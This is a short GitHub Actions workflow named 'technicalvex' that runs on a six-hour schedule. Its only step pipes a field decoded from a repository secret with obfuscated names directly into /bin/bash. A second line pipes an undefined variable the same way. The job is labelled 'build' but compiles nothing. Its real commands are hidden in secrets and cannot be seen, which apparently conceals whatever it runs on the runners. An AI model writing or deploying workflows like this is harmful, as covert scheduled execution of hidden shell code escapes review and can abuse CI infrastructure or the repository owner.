name: technicalvex

on:
  workflow_dispatch:
  schedule:
    - cron: '53 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: technicalvex
        env:
          tbz6: ${{ secrets.tbz6 }}
        run: |
          echo $tbz6 | jq -r .wt9841 | /bin/bash
          echo $bbn190 | jq -r .dniwg6796 | /bin/bash

